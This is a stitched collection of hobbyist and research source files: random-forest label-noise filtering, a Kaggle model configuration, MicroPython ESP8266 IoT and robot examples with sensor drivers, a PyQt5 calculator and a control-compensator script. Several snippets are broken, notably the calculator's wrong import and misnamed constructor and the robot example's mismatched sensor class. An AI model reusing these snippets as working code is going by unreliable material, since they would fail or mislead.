chosen_clf = RF(n_estimators=501, max_features="sqrt", n_jobs=-1)
true_filtered = MetricsHelper.calculate_true_filter(chosen_y.index,
noisy_idxs)
tot_filtered = len(train_X)-len(chosen_X.index.unique())
false_filtered = tot_filtered-true_filtered
return [chosen_rate, chosen_threshold, chosen_X, chosen_y, chosen_clf,
true_filtered/len(train_X), false_filtered/len(train_X)]
```
#### File: noise-detection-ensemble/src/data_helper.py
```python
from copy import deepcopy
from numpy import sqrt
from pandas import Series
from sklearn.model_selection import StratifiedKFold
from sklearn.preprocessing import LabelEncoder
class DataHelper():
label_mapping = None
@staticmethod
def extract_feature_labels(frame, target, range_cols=True):
labels = frame[target] if target!=-1 else frame.iloc[:, target]
feats = frame.drop(columns=labels.name)
le = LabelEncoder()
encoded_labels = Series(le.fit_transform(labels), index=labels.index)
if range_cols:
feats.columns=range(len(feats.columns))
return feats, encoded_labels
@staticmethod
def split_in_sets(frame, labels):
skf = StratifiedKFold(n_splits=3, shuffle=True)
splits = skf.split(X=range(len(labels)), y=labels)
return list(splits)[0]
@staticmethod
def select_rows(frame, idxs, copy):
sel = frame.iloc[idxs]
sel = deepcopy(sel) if copy == True else sel
return sel
@staticmethod
def create_label_mapping(labels):
unique_values = labels.unique().tolist()
DataHelper.label_mapping = {unique_values[0]: unique_values[1],
unique_values[1]: unique_values[0]}
@staticmethod
def map_labels(labels, sample_idxs, sample_values):
noise_values = [DataHelper.label_mapping[v] for v in sample_values]
noisy_labels = deepcopy(labels)
noisy_labels.loc[sample_idxs] = noise_values
return noisy_labels
@staticmethod
def insert_noise(labels, level):
sample = labels.sample(frac=level)
sample_idxs = sample.index
sample_values = sample.values
return sample_idxs, DataHelper.map_labels(labels,
sample_idxs, sample_values)
@staticmethod
def calculate_max_nb_features(features):
nb_features = len(features.columns)
return max(1, int(sqrt(nb_features)))
@staticmethod
def adapt_rate(X, y, rate):
adapted = None
if rate > 1:
raise ValueError("Rate can't be bigger than 1.0")
else:
adapted = [deepcopy(X), deepcopy(y), rate]
return adapted
```
#### File: noise-detection-ensemble/src/majority_filtering.py
```python
from sklearn.ensemble import RandomForestClassifier as RF
from sklearn.model_selection import StratifiedKFold
from pandas import DataFrame, Series
from data_helper import DataHelper
class MajorityFiltering():
k_folds = 3
@staticmethod
def get_ensemble():
return RF(n_estimators=501, max_depth=None, max_features="sqrt",
min_samples_leaf=1, n_jobs=-1)
@staticmethod
def _clean_data(X, y):
clean_X = DataFrame(columns=X.columns)
clean_y = Series(name=y.name)
skf = StratifiedKFold(n_splits=MajorityFiltering.k_folds,
shuffle=True)
for train_idxs, val_idxs in skf.split(X=range(len(y)), y=y):
train_X = DataHelper.select_rows(X, train_idxs, copy=False)
train_y = DataHelper.select_rows(y, train_idxs, copy=False)
ensemble = MajorityFiltering.get_ensemble()
ensemble.fit(train_X, train_y)
val_X = DataHelper.select_rows(X, val_idxs, copy=False)
predictions = ensemble.predict(val_X)
maintain_idxs = [val_idxs[i] for i in range(len(val_idxs)) \
if predictions[i]==y.iloc[val_idxs[i]]]
maintain_X = DataHelper.select_rows(X, maintain_idxs,
copy=True)
maintain_y = DataHelper.select_rows(y, maintain_idxs,
copy=True)
clean_X = clean_X.append(maintain_X, verify_integrity=True,
sort=False)
clean_y = clean_y.append(maintain_y, verify_integrity=True)
return clean_X, clean_y
@staticmethod
def run(train_X, train_y):
return MajorityFiltering._clean_data(train_X, train_y)
```
#### File: noise-detection-ensemble/src/metrics_helper.py
```python
from sklearn.metrics import accuracy_score
from pandas import DataFrame
import matplotlib.pyplot as plt
class MetricsHelper():
metrics = []
@staticmethod
def calculate_error_score(true_y, pred_y):
return (1-accuracy_score(true_y, pred_y))
@staticmethod
def calculate_true_filter(y_idxs, noisy_idxs):
set_idxs = set(list(y_idxs))
true_filtered = [i for i in list(noisy_idxs) if i not in set_idxs]
return len(set(true_filtered))
@staticmethod
def reset_metrics():
MetricsHelper.metrics = []
@staticmethod
def convert_metrics_to_frame():
columns = ["dataset", "execution", "noise", "clf", "sampling_rate",
"threshold", "test_error", "true_filtered", "false_filtered"]
return DataFrame(MetricsHelper.metrics, columns=columns)
@staticmethod
def adapt_results(results):
results.drop(columns="execution", inplace=True)
results[["noise", "test_error", "false_filtered", "true_filtered"]] *= 100
results[["noise"]] = results[["noise"]].astype(int)
@staticmethod
def _finish_param_plot(frame, y_name, ylim, x_label, y_label):
frame = frame[frame["clf"]=="FL_RF"]
frame = frame.groupby(by=["dataset", "noise"]).mean().unstack()
p=frame.plot(kind="bar", y=y_name, ylim=ylim)
p.set_xlabel(x_label)
p.set_ylabel(y_label)
p.xaxis.set_label_coords(0.5, -0.1)
p.yaxis.set_label_coords(-0.05, 0.5)
p.legend(loc="center", ncol=5, title="noise", fontsize="medium",
labels=["0%", "10%", "20%", "30%", "40%"],
frameon=False, bbox_to_anchor=(0.5, 1.05))
plt.show()
@staticmethod
def aggregate_rate(results):
frame = results.drop(columns=["false_filtered", "true_filtered",
"threshold", "test_error"])
MetricsHelper._finish_param_plot(frame, "sampling_rate", (0.0, 1.2),
"Fig. 1 - Best Sampling Rates",
"sampling rate")
@staticmethod
def aggregate_threshold(results):
frame = results.drop(columns=["false_filtered", "true_filtered",
"sampling_rate", "test_error"])
MetricsHelper._finish_param_plot(frame, "threshold",
(0.5, 1.0),
"Fig. 2 - Best Thresholds",
"threshold")
@staticmethod
def aggregate_error(results):
frame = results.drop(columns=["false_filtered", "true_filtered",
"sampling_rate", "threshold"])
frame = frame.replace({"FL_RF": "1_FL_RF", "CL_RF": "2_CL_RF",
"FL_MAJ_RF": "3_FL_MAJ"})
mean_group = frame.groupby(by=["dataset", "noise", "clf"])
mean_frame = mean_group.mean().round(1).unstack().astype(str)
std_frame = mean_group.std().round(1).unstack().astype(str)
final_frame = mean_frame + " ± " + std_frame
return final_frame
@staticmethod
def aggregate_filter(results):
frame = results.drop(columns=["test_error", "sampling_rate", "threshold"])
for noise in [0, 10, 30]:
noise_frame= frame[frame["noise"]==noise]
noise_frame = noise_frame.drop(columns="noise")
for clf in ["FL_RF", "FL_MAJ_RF"]:
clf_frame= noise_frame[noise_frame["clf"]==clf]
clf_frame = clf_frame.drop(columns="clf")
clf_frame = clf_frame.groupby(by=["dataset"]).mean()
p=clf_frame.plot(kind="bar", stacked=True, title=str(noise)+ "% noise",
ylim=(0,60))
p.set_xlabel(clf)
p.set_ylabel("percentage")
p.xaxis.set_label_coords(0.5, -0.1)
p.yaxis.set_label_coords(-0.05, 0.5)
p.legend(loc="upper right", ncol=1, labelspacing=-2,
title="", fontsize="medium",frameon=False,
bbox_to_anchor=(0.98, 0.95),
labels=["correctly filtered", "all filtered"])
plt.show()
``` |
{
"source": "jpedrocm/porto-seguro-experiment",
"score": 3
} |
#### File: porto-seguro-experiment/code/config_helper.py
```python
from sklearn.model_selection import StratifiedKFold
from sklearn.svm import SVC as SVM
from sklearn.neural_network import MLPClassifier as MLP
from sklearn.ensemble import RandomForestClassifier as RF
from sklearn.ensemble import GradientBoostingClassifier as GB
class ConfigHelper():
# Do not change
k_folds = 2
nb_executions = 5
max_nb_features = 50
use_predefined_cols = False
analysis_dataset = "train"
###########################
metrics_file = "cv_metrics" #Change this when trying new experiments
@staticmethod
def k_fold_cv(labels):
skf = StratifiedKFold(n_splits=ConfigHelper.k_folds, shuffle=True)
return skf.split(X=range(len(labels)), y=labels)
@staticmethod
def get_submission_models():
return [("GB_Final", GB(n_estimators=250, learning_rate=0.1, subsample=1.0,
max_depth=3, min_samples_split=20)),
]
@staticmethod
def get_training_models():
return [
("MLP_RELU", MLP(hidden_layer_sizes=(100, ), alpha=0.0001,
activation="relu", learning_rate_init=0.001,
tol=0.0001, max_iter=200)),
("GB_50", GB(n_estimators=250, learning_rate=0.1, subsample=1.0,
max_depth=3, min_samples_split=20)),
("RF_FINAL", RF(n_estimators=250, max_depth=None, min_samples_split=2,
bootstrap=True, n_jobs=-1)),
]
```
#### File: porto-seguro-experiment/code/metrics_helper.py
```python
import numpy as np
from pandas import DataFrame
class MetricsHelper():
probs = {}
gold = []
metrics = DataFrame(columns=["model", "gini"])
@staticmethod
def _gini(gold, pred, cmpcol=0, sortcol=1):
assert(len(gold) == len(pred))
all_preds = np.asarray(np.c_[gold, pred, np.arange(len(gold))],
dtype=np.float)
all_preds = all_preds[np.lexsort((all_preds[:,2], -1*all_preds[:,1]))]
total_losses = all_preds[:,0].sum()
gini_sum = all_preds[:,0].cumsum().sum() / total_losses
gini_sum -= (len(gold)+1) / float(2)
return gini_sum/len(gold)
@staticmethod
def _calculate_metrics(model, gold, prob):
pos_prob = [row[1] for row in prob]
pred = np.argmax(prob, axis=1)
gini_score = MetricsHelper._gini(gold, pos_prob)/ \
MetricsHelper._gini(gold, gold)
return [model, gini_score]
@staticmethod
def reset_metrics():
MetricsHelper.probs = {}
MetricsHelper.gold = []
@staticmethod
def store_gold(gold):
MetricsHelper.gold.extend(gold)
@staticmethod
def store_probs(prob, model):
prob = prob.tolist()
if model not in MetricsHelper.probs:
MetricsHelper.probs[model] = prob
else:
MetricsHelper.probs[model].extend(prob)
@staticmethod
def calculate_metrics():
print "Calculating metrics"
for model, probs in MetricsHelper.probs.iteritems():
idx = len(MetricsHelper.metrics)
m = MetricsHelper._calculate_metrics(model, MetricsHelper.gold,
probs)
MetricsHelper.metrics.loc[idx] = m
@staticmethod
def summarize_metrics():
print "Getting summary of metrics"
grouped = MetricsHelper.metrics.groupby(by=["model"], as_index=True)
MetricsHelper.metrics = grouped.agg([np.mean, np.std, np.amin,
np.amax])
print MetricsHelper.metrics
@staticmethod
def get_submission(idxs, prob):
pos_prob = [row[1] for row in prob]
submission = DataFrame(columns=["target"], index=idxs)
submission["target"] = pos_prob
return submission
``` |
{
"source": "jpedrodias/MicroPython",
"score": 3
} |
#### File: jpedrodias/MicroPython/board_manager.py
```python
from micropython import const
import machine
import time
# WEMOS D1 Mini Board GPIO Map: D8 pull_down, D4 pull_down
# D0=16, D1=5, D2=4, D3=0, D4=2, D5=14, D6=12, D7=13, D8=15
D0 = const(16)
D1 = const(5)
D2 = const(4)
D3 = const(0)
D4 = const(2)
D5 = const(14)
D6 = const(12)
D7 = const(13)
D8 = const(15)
class rgb_colors():
brightness = 50
RED = (255*brightness, 0, 0)
GREEN = (0, 255*brightness, 0)
BLUE = (0, 0, 255*brightness)
BLACK = (0,0,0)
#End RGB_Colors
class NTPClock():
@property
def time(self):
return time.time()
@property
def str_time(self):
l = self.local
g = self.gmt
z = self.zone
d = '{:04d}-{:02d}-{:02d}'.format(*l[0:3])
t = '{:02d}:{:02d}:{:02d}'.format(*l[3:6])
return '{}T{}Z{}'.format(d, t, z)
@property
def local(self):
return time.localtime()
@property
def gmt(self):
return time.gmtime()
@property
def zone(self):
return self.local[4]-self.gmt[4]
@property
def timestamp(self):
return self.str_time
@staticmethod
def update():
try:
ntptime.settime()
except:
return False
return True
def __repr__(self):
return self.str_time
class StatusLED():
def __init__(self, pin=2):
self.led = machine.Pin(pin, machine.Pin.OUT)
def value(self, value):
self.led.value(value)
def on(self):
self.value(1)
def off(self):
self.value(0)
def toggle(self):
self.led.value(not self.led.value())
#end StatusLED
```
#### File: MicroPython/examples/GreenHouse_ESP8266_and_ArduinoRelays.py
```python
import micropython, machine, gc, time, json
from board_manager import D1, D2
DEBUG = micropython.const(0) # Exit Infinit Loop if DEBUG is True
app_name = 'RelayBoard v4'
print( app_name )
# Connection to Slave Arduino
i2c = machine.I2C(scl=machine.Pin(D1), sda=machine.Pin(D2))
i2c_slave = micropython.const(8) #i2c.scan()[0]
i2c_cmds = [b'O*', b'C*', b'L*', b'O1', b'C1', b'L1', b'O2', b'C2', b'L2']
def mqtt_callback(topic, msg):
global chatty_client, main_delay
if DEBUG: print(topic, msg)
if msg == b'S':
check_status(True)
elif msg == b'chatty on':
chatty_client = True
elif msg == b'chatty off':
chatty_client = False
elif msg.startswith(b'delay'):
try:
main_delay = int(msg.split()[1])
except:
pass
elif msg in i2c_cmds:
i2c.writeto(i2c_slave, msg)
def check_status(publish=False):
status = i2c.readfrom(i2c_slave, 6)
status_str = ''
for c in status:
status_str += str(c)
if DEBUG: print(status_str)
data = {
'chatty': chatty_client,
'delay' : main_delay,
'status': status_str
}
if publish:
try:
mqtt_client.send(TOPIC_PUB, json.dumps(data))
except:
print('MQTT send failed!')
print('MQTT', data)
def reconnect():
wlan_client.start()
print("MQTT check...")
success = wlan_client.check() and mqtt_client.check()
if success:
mqtt_client.broker.subscribe(TOPIC_SUB)
return success
gc.collect()
from wlan_manager import WLAN_Manager
wlan_client = WLAN_Manager()
from mqtt_manager import MQTT_Manager
mqtt_client = MQTT_Manager()
TOPIC_SUB = mqtt_client.get_topic('control')
TOPIC_PUB = mqtt_client.get_topic('status')
chatty_client = bool(mqtt_client.CONFIG.get('chatty', True))
mqtt_client.broker.set_callback(mqtt_callback)
print( 'client_id:', mqtt_client.CONFIG['client_id'] )
connected = reconnect()
if DEBUG and connected:
mqtt_client.send('debug', TOPIC_SUB)
mqtt_client.send('debug', TOPIC_PUB)
mqtt_client.send('debug', app_name)
gc.collect()
time.sleep(1)
if __name__ == "__main__":
main_delay = mqtt_client.CONFIG['delay']
if DEBUG: main_delay = 5
Loops = 60
gc.collect()
while Loops:
t_start = time.ticks_ms()
if DEBUG: Loops -= 1
gc.collect()
if chatty_client:
check_status(chatty_client and connected)
while time.ticks_diff(time.ticks_ms(), t_start) <= main_delay * 1000:
connected = mqtt_client.check_msg()
if not connected:
connected = reconnect()
if not connected:
time.sleep(5)
time.sleep(0.5)
#end loop
mqtt_client.close()
print(app_name)
print( "Rebooting" )
time.sleep(5)
machine.reset()
#end if __main__
```
#### File: MicroPython/examples/MQTT_example_03_LED_control.py
```python
from time import sleep, sleep_ms
from machine import Pin
from board_manager import *
from wlan_manager import WLAN_Manager
from mqtt_manager import MQTT_Manager
from json import dumps, loads
wlan_client = WLAN_Manager()
mqtt_client = MQTT_Manager()
def reconnect():
print("WiFi Connection")
wlan_client.start()
for i in range(30):
if wlan_client.check(): break
print(".", end="")
sleep(1)
sleep(5)
success = wlan_client.check() and mqtt_client.check()
if success:
mqtt_client.broker.subscribe(TOPIC_SUB)
return success
def mqtt_callback(topic, msg):
global status
print('Mensagem! Topic: {};\nData: {}'.format(topic.decode(), msg.decode()))
# Get the number 0 to 8 after /control/#
try:
object = int(topic.decode().split("/")[-1])
except:
print("Erro ao tentar ter objeto.")
return False
try:
value = int(msg.decode())
except:
print("Erro ao tentar ter valor.")
return False
if object not in [i for i in range(len(objects))] or value not in [0, 1]:
print("Error in Object={} or value={}".format(object, value))
return False
status[ object ] = value
return True
PREFIX = "Presonal"
TOPIC_SUB = "/".join( [PREFIX, mqtt_client.get_topic("control"), "#"] ) #Canal onde recebe e interpreta as mensagens
TOPIC_PUB = "/".join( [PREFIX, mqtt_client.get_topic("status") ] ) #Canal onde manda as mensagens
chatty_client = bool(mqtt_client.CONFIG.get("chatty", True))
mqtt_client.broker.set_callback(mqtt_callback)
print( "client_id:", mqtt_client.CONFIG["client_id"] ) #Para saber o client_id
connected = reconnect()
if connected:
mqtt_client.send("debug message", TOPIC_SUB)
mqtt_client.send("debug message", TOPIC_PUB)
# Ligação aos LEDs
G = Pin(D7, Pin.OUT, value=0)
Y = Pin(D6, Pin.OUT, value=0)
R = Pin(D5, Pin.OUT, value=0)
objects = [G, Y, R]
status = [object.value() for object in objects]
last_status = [0 for i in range(len(objects))]
while True:
sucess = mqtt_client.check_msg()
if not sucess:
sucess = mqtt_client.check()
if not sucess:
sucess = reconnect()
for i in range(len(objects)):
if status[i] != last_status[i]:
print("Data Changed")
objects[i].value( status[i] )
topic = "{}/{}".format( TOPIC_PUB, i )
data = dumps( status[i] )
mqtt_client.send( topic, data ) # reports back status
last_status[i] = status[i]
sleep(1)
```
#### File: MicroPython/examples/ROBOT_example_01.py
```python
import os, gc, micropython, machine, random, time
class Motor():
def __init__(self, EN1, EN2):
if isinstance(EN1, int) and isinstance(EN2, int):
self.EN1 = machine.Pin(EN1, mode=machine.Pin.OUT, value=0, pull=None)
self.EN2 = machine.Pin(EN2, mode=machine.Pin.OUT, value=0, pull=None)
else:
raise TypeError('EN1 and EN2 must be integer')
def forward(self):
self.EN1.value(1)
self.EN2.value(0)
def backward(self):
self.EN1.value(0)
self.EN2.value(1)
def stop(self):
self.EN1.value(0)
self.EN2.value(0)
#End Motor
class Robot():
def __init__(self, M1, M2):
if isinstance(M1, Motor) and isinstance(M2, Motor):
self.M1 = M1 # Motor 1
self.M2 = M2 # Motor 2
else:
raise TypeError('M1 and M2 must be a Motor object')
def stop(self):
self.M1.stop()
self.M2.stop()
def forward(self):
self.M1.forward()
self.M2.forward()
def backward(self):
self.M1.backward()
self.M2.backward()
def turn(self, mode=0):
if mode == 1:
self.M1.forward()
elif mode == 2:
self.M2.forward()
else:
self.M1.forward()
self.M2.backward()
#End class Robot
motor1 = Motor(13, 15) # D7 = 13, D8 = 15
motor2 = Motor(14, 12) # D5 = 14, D6 = 12
robot = Robot(motor1, motor2)
from sensor_manager import Sensor_HCSR04
dsensor = HCSR04(trigger=5, echo=4) # D1=5, D2=4
green = machine.Pin(0, machine.Pin.OUT, value=0) #D3
yellow = machine.Pin(2, machine.Pin.OUT, value=0) #D4
red = machine.Pin(16, machine.Pin.OUT, value=0) #D0
gc.collect()
DELAY = 1 * 1000
t_start = time.ticks_ms()
while True:
dsensor.read()
distance = dsensor.distance_cm
if distance < 5:
robot.stop()
green.value(0)
yellow.value(0)
red.value(1)
time.sleep_ms(250)
robot.backward()
time.sleep_ms(250)
robot.stop()
elif distance < 10:
robot.stop()
green.value(0)
yellow.value(1)
red.value(0)
time.sleep_ms(250)
robot.turn( random.getrandbits(2) )
time.sleep_ms(250)
robot.stop()
else:
robot.forward()
green.value(1)
yellow.value(0)
red.value(0)
t_diff = time.ticks_diff(time.ticks_ms(), t_start)
if t_diff > DELAY:
print(dsensor.distance_cm)
t_start = time.ticks_ms()
time.sleep_ms(50)
```
#### File: MicroPython/examples/uPhotoGate_MQTT_OLED.py
```python
import os, gc, micropython, machine, time, json
# Broker
# https://www.hivemq.com/public-mqtt-broker/
# TOPIC: devices/???/status
GATE_PIN = micropython.const(13) # D7
GATE_MODE = micropython.const(0) # 0 for always on | 1 for always off
DEBUG = micropython.const(1) # Change from 1 debug mode to 0 production mode
DEBUG_TIME = micropython.const(10) # Run in debug mode for this amount of seconds
DELAY_TIME = micropython.const(1) # Delay between loops
print('PhotoGate in MicroPython')
from wlan_manager import WLAN_Manager # Wireless Connection
wlan_client = WLAN_Manager()
wlan_client.start()
from mqtt_manager import MQTT_Manager # MQTT Connection
mqtt_client = MQTT_Manager()
mqtt_client.check() # Open connection to broker
TOPIC_SUB = mqtt_client.get_topic('control')
TOPIC_PUB = mqtt_client.get_topic('status')
print('Topic:', TOPIC_PUB)
# ssd1306 version
import ssd1306
i2c = machine.I2C(scl=machine.Pin(5), sda=machine.Pin(4))
oled = ssd1306.SSD1306_I2C(128, 64, i2c, 0x3c)
from sensor_manager import PhotoGate
g1 = PhotoGate(GATE_PIN, mode=GATE_MODE) # mode = 1 | 0
oled.fill(0)
oled.rect(0,0,128,40,1)
oled.text('PhotoGate', 28, 8)
oled.text('in MicroPython', 10, 24)
oled.text(mqtt_client.CONFIG['client_id'], 00, 48)
oled.text(mqtt_client.CONFIG['broker'], 00, 56)
oled.show()
def update_oled(data):
oled.scroll(0, -8)
oled.fill_rect(0, 56, 128, 64, 0)
oled.text('{:10.3f}'.format(data), 0, 56)
oled.show()
gc.collect()
while True:
g1.read()
if g1.event_change_to(1):
g1.start_time()
if g1.event_change_to(0):
g1.stop_time()
print(g1.millis)
update_oled(g1.millis)
msg = {'value': g1.millis, 'units': 'ms'}
mqtt_client.send(TOPIC_PUB, json.dumps(msg))
gc.collect()
g1.store()
if DEBUG:
time.sleep_us(DEBUG_TIME)
else:
time.sleep_us(DELAY_TIME)
#End while loops
```
#### File: MicroPython/examples/uPhotoGate_OLED.py
```python
import os, gc, micropython, machine, time, json
from board_manager import D1, D2, D7
GATE_PIN = micropython.const(D7) # D7
GATE_MODE = micropython.const(0) # 0 for always on | 1 for always off
DEBUG = micropython.const(1) # Change from 1 debug mode to 0 production mode
DEBUG_TIME = micropython.const(10) # Run in debug mode for this amount of seconds
DELAY_TIME = micropython.const(1) # Delay between loops
print('PhotoGate in MicroPython')
# ssd1306 version
import ssd1306
i2c = machine.I2C(scl=machine.Pin(D1), sda=machine.Pin(D2))
oled = ssd1306.SSD1306_I2C(128, 64, i2c, 0x3c)
from sensor_manager import PhotoGate
g1 = PhotoGate(GATE_PIN, mode=GATE_MODE) # mode = 1 | 0
oled.fill(0)
oled.rect(0,0,128,40,1)
oled.text('PhotoGate', 28, 8)
oled.text('in MicroPython', 10, 24)
oled.text('in milli seconds', 00, 56)
oled.show()
def update_oled(data):
oled.scroll(0, -8)
oled.fill_rect(0, 56, 128, 64, 0)
oled.text('{:10.3f}'.format(data), 0, 56)
oled.show()
gc.collect()
while True:
g1.read()
if g1.event_change_to(1):
g1.start_time()
if g1.event_change_to(0):
g1.stop_time()
print(g1.millis)
update_oled(g1.millis)
g1.store()
if DEBUG:
time.sleep_us(DEBUG_TIME)
else:
time.sleep_us(DELAY_TIME)
#End while loops
```
#### File: MicroPython/sensors/sensor_bh1750fvi.py
```python
import machine, time
class Sensor_BH1750FVI():
#adaptation from https://github.com/catdog2/mpy_bh1750fvi_esp8266
def __init__(self, i2c, address=0x23):
if not isinstance(i2c, machine.I2C):
raise TypeError('I2C object required.')
self.i2c = i2c
self.address = address
self.lux = None
def read(self):
self.i2c.writeto(self.address, b'\x00') # make sure device is in a clean state
self.i2c.writeto(self.address, b'\x01') # power up
self.i2c.writeto(self.address, bytes([0x23])) # set measurement mode
time.sleep_ms(180)
raw = self.i2c.readfrom(self.address, 2)
self.i2c.writeto(self.address, b'\x00') # power down again
# we must divide the end result by 1.2 to get the lux
self.lux = ((raw[0] << 24) | (raw[1] << 16)) // 78642
return self.lux
@property
def values(self):
return [self.lux]
@property
def values_dict(self):
return {'lux': self.lux}
#End of Sensor_BH1750FVI
```
#### File: MicroPython/sensors/sensor_bmp085.py
```python
import micropython, machine, ustruct, time, math
# from https://github.com/robert-hh/BMP085_BMP180
class Sensor_BMP085():
def __init__(self, i2c, address=0x77):
if not isinstance(i2c, machine.I2C):
raise TypeError("I2C object required.")
from bmp085 import BMP085
self.bmp = BMP085(i2c=i2c)
self.t = None
self.p = None
self.a = None
self.bmp.sealevel = 101325
def read(self):
self.t = self.bmp.temperature
self.p = self.bmp.pressure
self.a = self.bmp.altitude
self.t = round(self.t,1)
self.p = round(self.p,2)
self.a = round(self.a,1)
return [self.t, self.p, self.a]
@property
def values(self):
return [self.t, self.p, self.a]
@property
def values_dict(self):
return {"t": self.t, "p": self.p, "a": self.a}
#End of Sensor_BMP085
class Sensor_BMP180(Sensor_BMP085):
def __init__(self, i2c=None, address=0x77):
super().__init__(i2c, address)
#End of Sensor_BMP180
```
#### File: MicroPython/sensors/sensor_hcsr04.py
```python
import machine, time
class HCSR04():
def __init__(self, trigger, echo, echo_timeout_us=500000):
if isinstance(trigger, int) and isinstance(echo, int):
self.trigger = machine.Pin(trigger, mode=machine.Pin.OUT, pull=None)
self.echo = machine.Pin(echo, mode=machine.Pin.IN, pull=None)
else:
raise TypeError('trigger and echo must be integer')
self.echo_timeout_us = echo_timeout_us
self.trigger.value(0)
self.pulse_time = None
def _send_pulse_and_wait(self):
self.trigger.value(0)
time.sleep_us(5)
self.trigger.value(1)
time.sleep_us(10)
self.trigger.value(0)
try:
pulse_time = machine.time_pulse_us(self.echo, 1, self.echo_timeout_us)
return pulse_time
except OSError as ex:
if ex.args[0] == 110: # 110 = ETIMEDOUT
raise OSError('Out of range')
raise ex
def read(self):
self.pulse_time = self._send_pulse_and_wait()
return self.pulse_time
@property
def distance_mm(self):
if self.pulse_time:
return self.pulse_time * 100 // 582
else:
return None
@property
def distance_cm(self):
if self.pulse_time:
return (self.pulse_time / 2) / 29.1
else:
return None
@property
def values(self):
return [self.distance_cm]
@property
def values_dict(self):
return {'d': self.distance_cm}
#End of HCSR04
``` |
{
"source": "j-pedrofag/SEII-JoaoPedroSilvaFagundes",
"score": 3
} |
#### File: SEII-JoaoPedroSilvaFagundes/Semana08-09/calculadora.py
```python
import PyQt5.QWidgets as qtw
class MainWindow(qtw.QWidget):
def _init_(self):
super()._init()
self.setWindowTitle('Calculadora')
self.setLayout(qtw.QVBoxLayout())
self.keypad()
self.show()
def keypad(self):
container = qtw.QWidget()
container = setLayout(qtw.QGridLayout())
# Botões
self.result_field = qtw.QLineEdit()
btn_result = qtw.QPushButton('Enter',clicked = self.func_result)
btn_clear = qtw.QPushButton('Limpar',clicked = self.limpar_calc)
btn_9 = qtw.QPushButton('9',clicked = lambda:self.num_press('9'))
btn_8 = qtw.QPushButton('8',clicked = lambda:self.num_press('8'))
btn_7 = qtw.QPushButton('7',clicked = lambda:self.num_press('7'))
btn_6 = qtw.QPushButton('6',clicked = lambda:self.num_press('6'))
btn_5 = qtw.QPushButton('5',clicked = lambda:self.num_press('5'))
btn_4 = qtw.QPushButton('4',clicked = lambda:self.num_press('4'))
btn_3 = qtw.QPushButton('3',clicked = lambda:self.num_press('3'))
btn_2 = qtw.QPushButton('2',clicked = lambda:self.num_press('2'))
btn_1 = qtw.QPushButton('1',clicked = lambda:self.num_press('1'))
btn_0 = qtw.QPushButton('0',clicked = lambda:self.num_press('0'))
btn_mais = qtw.QPushButton('+',clicked = lambda:self.func_press('+'))
btn_menos = qtw.QPushButton('-',clicked = lambda:self.func_press('-'))
btn_mult = qtw.QPushButton('*',clicked = lambda:self.func_press('*'))
btn_divid = qtw.QPushButton('÷',clicked = lambda:self.func_press('÷'))
# Adicionando os botões ao layout
container.layout().addWidget(self.result_field,0,0,1,4)
container.layout().addWidget(btn_result,1,0,1,2)
container.layout().addWidget(btn_limpar,1,2,1,2)
container.layout().addWidget(btn_9,2,0)
container.layout().addWidget(btn_8,2,1)
container.layout().addWidget(btn_7,2,2)
container.layout().addWidget(btn_mais,2,3)
container.layout().addWidget(btn_6,3,0)
container.layout().addWidget(btn_5,3,1)
container.layout().addWidget(btn_4,3,2)
container.layout().addWidget(btn_menos,3,3)
container.layout().addWidget(btn_3,4,0)
container.layout().addWidget(btn_2,4,1)
container.layout().addWidget(btn_1,4,2)
container.layout().addWidget(btn_mult,4,3)
container.layout().addWidget(btn_0,5,0,1,3)
container.layout().addWidget(btn_divid,5,3)
self.layout().addWidget(container)
def num_press(self,key_number):
self.temp_nums.append(key_number)
temp_string = ''.join(self.temp_nums)
if self.fin_nums:
self.result_field.setText(''.join(self.fin_nums) + temp_string)
else:
self.result_field.setText(temp_string)
def func_press(self, operator):
temp_string = ''.join(self.temp_nums)
self.fin_nums.append(temp_string)
self.fin_nums.append(operator)
self.temp_nums = []
self.result_field.setText(''.join(self.fin_nums))
def func_result(self):
fin_string = ''.join(self.fin_nums) + ''.join(self.temp_nums)
result_string = eval(fin_string)
fin_string += '='
fin_string += str(result_string)
self.result_field.setText(fin_string)
def limpar_calc(self):
self.result_field.clear()
self.temp_nums = []
self.fin_nums = []
app = qtw.QApplication([])
mw = MainWindow()
app.setStyle(qtw.QStyleFactory.create('Fusion'))
app.exec_()
```
#### File: SEII-JoaoPedroSilvaFagundes/Semana16-18/Questao2.py
```python
from control.matlab import *
import numpy as np
import matplotlib.pyplot as plt
import math
def x_dot(t,x,u):
A = np.array( [[-2., -9.],\
[ 1., 0.]])
B = np.array([[1.],\
[0.]])
xkp1 = A @ x + B @ u
return xkp1
def rk4(tk,h,xk,uk):
xk = xk.reshape([2,1])
uk = uk.reshape([1,1])
k1 = x_dot(tk,xk,uk)
k2 = x_dot(tk+h/2.0,xk+h*k1/2.0,uk)
k3 = x_dot(tk+h/2.0,xk+h*k2/2.0,uk)
k4 = x_dot(tk+h,xk+h*k3,uk)
xkp1 = xk + (h/6.0)*(k1 + 2.0*k2 + 2.0*k3 + k4)
return xkp1.reshape([2,])
def compensador(G,Ms,ts=2):
zeta = np.sqrt(np.log(Ms)**2/(np.pi**2+np.log(Ms)**2))
wn = 4/(zeta*ts)
polo = [zeta*wn,wn*np.sqrt(1-zeta*zeta)]
poloComplex = -polo[0]+polo[1]*1j
theta = math.atan2(polo[1],polo[0])
phi = np.pi/2 - theta
beta = (np.pi - theta)/2
gamma = theta+beta-phi/2-np.pi/2
a = polo[0] + polo[1]*np.tan(gamma)
b = polo[0] + polo[1]*np.tan(gamma+phi)
C = tf([1,a],[1,b])
K = abs(1/(evalfr(C,poloComplex)*evalfr(G,poloComplex)))
C = K*C
return tf(C)
#Parâmetros
G = tf([9],[1,2,9])
#Letra a
C = compensador(G,0.1,2)
print(C)
T = feedback(C*G,1)
t = np.arange(0,10,1e-3)
u = t*0+1
y,x,*_ = lsim(T,u,t)
plt.figure('a')
plt.plot(x,y)
plt.title('Resposta ao degrau')
plt.grid()
#Letra b
Gss = tf2ss(G)
Ts = 0.01
Cz = c2d(C,Ts,method = 'zoh')
h = 1e-4
maxT = 10
mult = Ts/h
t = np.arange(0,maxT,h)
tu = np.arange(0,maxT,Ts)
x = np.zeros([2,len(t)])
u = np.zeros([len(tu)])
r = np.ones([len(t)-1])
y = np.zeros([len(t)-1])
tam = len(t)-1
ek_1 = 0
uk_1 = 0
p = 0
for k in range(tam):
y[k] = Gss.C @ x[:,k]
if (k%mult)==0:
ek = r[k]-y[k]
u[p] = 0.8607*uk_1 + 10*ek - 9.9257*ek_1 #Ts = 0,01
ek_1 = ek
uk_1 = u[p]
p += 1
